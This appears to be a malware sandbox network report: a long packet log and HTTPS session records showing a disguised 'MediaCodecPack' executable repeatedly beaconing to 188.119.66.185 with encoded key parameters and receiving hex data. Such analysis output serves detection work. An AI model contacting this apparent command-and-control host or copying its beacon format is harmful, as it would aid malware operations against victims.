                                                                                          Dec 18, 2024 13:45:28.719039917 CET49819443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:28.719058990 CET44349819188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:28.719119072 CET49819443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:28.719145060 CET44349819188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:28.719208002 CET49819443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:28.719274044 CET49819443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:28.719293118 CET44349819188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:28.835808992 CET49825443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:28.835855007 CET44349825188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:28.835988045 CET49825443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:28.836177111 CET49825443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:28.836191893 CET44349825188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:30.289798021 CET44349825188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:30.289916992 CET49825443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:30.290400982 CET49825443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:30.290410042 CET44349825188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:30.290555000 CET49825443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:30.290560961 CET44349825188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:30.977081060 CET44349825188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:30.977236032 CET49825443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:30.977262020 CET44349825188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:30.977317095 CET49825443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:30.977333069 CET44349825188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:30.977396965 CET49825443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:30.977551937 CET49825443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:30.977567911 CET44349825188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:31.086152077 CET49831443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:31.086178064 CET44349831188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:31.086354017 CET49831443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:31.086879969 CET49831443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:31.086891890 CET44349831188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:32.568747044 CET44349831188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:32.568917036 CET49831443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:32.569350958 CET49831443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:32.569360018 CET44349831188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:32.569540024 CET49831443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:32.569545031 CET44349831188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:33.376884937 CET44349831188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:33.376961946 CET44349831188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:33.377016068 CET49831443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:33.377017021 CET49831443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:33.377207994 CET49831443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:33.377221107 CET44349831188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:33.491982937 CET49837443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:33.492019892 CET44349837188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:33.492117882 CET49837443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:33.492403030 CET49837443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:33.492419004 CET44349837188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:35.172116995 CET44349837188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:35.172199011 CET49837443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:35.172689915 CET49837443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:35.172698021 CET44349837188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:35.172854900 CET49837443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:35.172859907 CET44349837188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:35.882014990 CET44349837188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:35.882080078 CET44349837188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:35.882209063 CET49837443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:35.882381916 CET49837443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:35.882400036 CET44349837188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:35.994149923 CET49843443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:35.994190931 CET44349843188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:35.994525909 CET49843443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:35.994601965 CET49843443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:35.994610071 CET44349843188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:37.453876972 CET44349843188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:37.453938961 CET49843443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:37.454461098 CET49843443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:37.454477072 CET44349843188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:37.454694033 CET49843443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:37.454704046 CET44349843188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:38.164594889 CET44349843188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:38.164655924 CET49843443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:38.164665937 CET44349843188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:38.164678097 CET44349843188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:38.164735079 CET49843443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:38.164764881 CET49843443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:38.164966106 CET49843443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:38.164979935 CET44349843188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:38.273550034 CET49849443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:38.273648024 CET44349849188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:38.273741961 CET49849443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:38.274019957 CET49849443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:38.274058104 CET44349849188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:39.913723946 CET44349849188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:39.918051958 CET49849443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:39.919998884 CET49849443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:39.920021057 CET44349849188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:39.925173044 CET49849443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:39.925189972 CET44349849188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:40.598942041 CET44349849188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:40.599016905 CET44349849188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:40.599091053 CET49849443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:40.599344969 CET49849443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:40.599380016 CET44349849188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:40.710850954 CET49855443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:40.710913897 CET44349855188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:40.710983038 CET49855443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:40.711339951 CET49855443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:40.711359978 CET44349855188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:42.175606966 CET44349855188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:42.175674915 CET49855443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:42.176124096 CET49855443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:42.176141024 CET44349855188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:42.176314116 CET49855443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:42.176322937 CET44349855188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:43.032818079 CET44349855188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:43.032886028 CET49855443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:43.032905102 CET44349855188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:43.032953024 CET49855443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:43.042020082 CET49855443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:43.042046070 CET44349855188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:43.148296118 CET49861443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:43.148349047 CET44349861188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:43.148427963 CET49861443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:43.148689032 CET49861443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:43.148706913 CET44349861188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:44.632647991 CET44349861188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:44.633871078 CET49861443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:44.639102936 CET49861443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:44.639116049 CET44349861188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:44.639261961 CET49861443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:44.639267921 CET44349861188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:45.355252028 CET44349861188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:45.355356932 CET44349861188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:45.355405092 CET49861443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:45.355406046 CET49861443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:45.399626970 CET49861443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:45.399655104 CET44349861188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:45.614869118 CET49867443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:45.614891052 CET44349867188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:45.614969015 CET49867443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:45.624692917 CET49867443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:45.624708891 CET44349867188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:47.273571014 CET44349867188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:47.273710012 CET49867443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:47.274228096 CET49867443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:47.274239063 CET44349867188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:47.274430990 CET49867443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:47.274435997 CET44349867188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:48.150911093 CET44349867188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:48.151016951 CET44349867188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:48.151036024 CET49867443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:48.151067972 CET49867443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:48.152339935 CET49867443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:48.152344942 CET44349867188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:48.273159027 CET49878443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:48.273200035 CET44349878188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:48.273292065 CET49878443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:48.273551941 CET49878443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:48.273565054 CET44349878188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:49.799698114 CET44349878188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:49.799807072 CET49878443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:49.800255060 CET49878443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:49.800270081 CET44349878188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:49.800467014 CET49878443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:49.800472021 CET44349878188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:50.527865887 CET44349878188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:50.527932882 CET44349878188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:50.528076887 CET49878443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:50.576919079 CET49878443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:50.576939106 CET44349878188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:50.695166111 CET49883443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:50.695225954 CET44349883188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:50.695558071 CET49883443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:50.695796967 CET49883443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:50.695808887 CET44349883188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:52.148727894 CET44349883188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:52.148792028 CET49883443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:52.149368048 CET49883443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:52.149379015 CET44349883188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:52.149684906 CET49883443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:52.149689913 CET44349883188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:52.835139990 CET44349883188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:52.835206032 CET44349883188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:52.835257053 CET49883443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:52.835283995 CET49883443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:52.835587978 CET49883443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:52.835608006 CET44349883188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:52.945089102 CET49889443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:52.945147038 CET44349889188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:52.945291996 CET49889443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:52.945622921 CET49889443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:52.945636034 CET44349889188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:54.395134926 CET44349889188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:54.395265102 CET49889443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:54.395817995 CET49889443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:54.395823956 CET44349889188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:54.396008015 CET49889443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:54.396012068 CET44349889188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:55.077147961 CET44349889188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:55.077234030 CET44349889188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:55.077282906 CET49889443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:55.077320099 CET49889443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:55.077456951 CET49889443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:55.077475071 CET44349889188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:55.196115971 CET49894443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:55.196157932 CET44349894188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:55.196229935 CET49894443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:55.196616888 CET49894443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:55.196631908 CET44349894188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:56.835042000 CET44349894188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:56.835103035 CET49894443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:56.836113930 CET49894443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:56.836113930 CET49894443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:56.836122036 CET44349894188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:56.836128950 CET44349894188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:57.544200897 CET44349894188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:57.544266939 CET44349894188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:57.544388056 CET49894443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:57.544388056 CET49894443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:57.544670105 CET49894443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:57.544694901 CET44349894188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:57.665142059 CET49900443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:57.665190935 CET44349900188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:57.665262938 CET49900443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:57.665581942 CET49900443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:57.665596008 CET44349900188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:59.123914003 CET44349900188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:59.123986959 CET49900443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:59.124547958 CET49900443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:59.124555111 CET44349900188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:59.124738932 CET49900443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:59.124743938 CET44349900188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:59.807970047 CET44349900188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:59.808042049 CET44349900188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:59.808088064 CET49900443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:59.808088064 CET49900443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:59.813894987 CET49900443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:59.813919067 CET44349900188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:59.956127882 CET49905443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:59.956168890 CET44349905188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:59.956252098 CET49905443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:59.956517935 CET49905443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:59.956532955 CET44349905188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:46:01.600328922 CET44349905188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:46:01.600395918 CET49905443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:46:01.600769043 CET49905443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:46:01.600775003 CET44349905188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:46:01.602596998 CET49905443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:46:01.602602959 CET44349905188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:46:02.411747932 CET44349905188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:46:02.411807060 CET49905443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:46:02.411820889 CET44349905188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:46:02.412044048 CET49905443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:46:02.477344036 CET49905443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:46:02.477384090 CET44349905188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:46:02.730595112 CET49911443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:46:02.730643034 CET44349911188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:46:02.730792046 CET49911443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:46:02.742731094 CET49911443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:46:02.742757082 CET44349911188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:46:04.210747957 CET44349911188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:46:04.210833073 CET49911443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:46:04.213308096 CET49911443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:46:04.213308096 CET49911443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:46:04.213323116 CET44349911188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:46:04.213339090 CET44349911188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:46:04.897619963 CET44349911188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:46:04.897696018 CET44349911188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:46:04.897731066 CET49911443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:46:04.897814989 CET49911443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:46:04.898766041 CET49911443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:46:04.898798943 CET44349911188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:46:05.010061026 CET49918443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:46:05.010097027 CET44349918188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:46:05.010152102 CET49918443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:46:05.010420084 CET49918443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:46:05.010433912 CET44349918188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:46:06.463645935 CET44349918188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:46:06.464107990 CET49918443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:46:06.465538025 CET49918443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:46:06.465543985 CET44349918188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:46:06.469510078 CET49918443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:46:06.469516039 CET44349918188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:46:07.434654951 CET44349918188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:46:07.434710979 CET44349918188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:46:07.434724092 CET49918443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:46:07.434773922 CET49918443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:46:07.434915066 CET49918443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:46:07.434930086 CET44349918188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:46:07.556705952 CET49924443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:46:07.556751966 CET44349924188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:46:07.556848049 CET49924443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:46:07.557984114 CET49924443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:46:07.558012009 CET44349924188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:46:09.283809900 CET44349924188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:46:09.283893108 CET49924443192.168.2.4188.119.66.185
                                                                                          • 188.119.66.185
                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          0192.168.2.449737188.119.66.1854435544C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 12:44:58 UTC283OUTGET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b82a8dcd6c946851e30088883250aa15d105633775b0e650f2ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261cda3088 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 12:44:59 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 12:44:59 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          2024-12-18 12:44:59 UTC768INData Raw: 32 66 34 0d 0a 38 62 37 32 33 63 36 38 65 65 31 38 34 30 33 63 36 36 30 66 62 66 65 30 33 38 34 62 32 30 62 36 62 36 39 30 38 36 33 65 34 38 61 36 33 62 64 62 38 34 37 35 64 63 32 63 31 66 64 34 30 33 63 32 64 31 36 30 35 34 65 37 31 38 63 33 34 32 37 61 32 61 37 33 38 61 62 32 31 35 66 39 61 64 34 30 64 63 38 36 62 31 63 65 33 35 36 62 64 33 66 34 35 35 64 62 39 37 66 32 34 66 64 64 64 33 39 66 35 35 61 63 62 64 66 35 63 35 30 61 31 64 63 36 64 35 30 37 30 30 64 63 33 32 32 36 30 37 64 32 33 32 38 39 64 65 64 33 39 34 35 64 34 38 63 32 37 39 33 31 65 37 64 66 30 30 34 62 36 65 31 34 37 37 64 33 66 31 31 30 37 66 62 33 66 32 35 66 61 65 65 65 65 30 35 35 61 32 36 61 63 37 63 65 32 30 65 62 66 31 63 34 65 65 35 34 31 33 38 66 35 32 39 39 33 65 61 66 33 34
                                                                                          Data Ascii: 2f48b723c68ee18403c660fbfe0384b20b6b690863e48a63bdb8475dc2c1fd403c2d16054e718c3427a2a738ab215f9ad40dc86b1ce356bd3f455db97f24fddd39f55acbdf5c50a1dc6d50700dc322607d23289ded3945d48c27931e7df004b6e1477d3f1107fb3f25faeeee055a26ac7ce20ebf1c4ee54138f52993eaf34


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          1192.168.2.449755188.119.66.1854435544C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-18 12:45:04 UTC291OUTGET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Host: 188.119.66.185
                                                                                          2024-12-18 12:45:04 UTC200INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                          Date: Wed, 18 Dec 2024 12:45:04 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
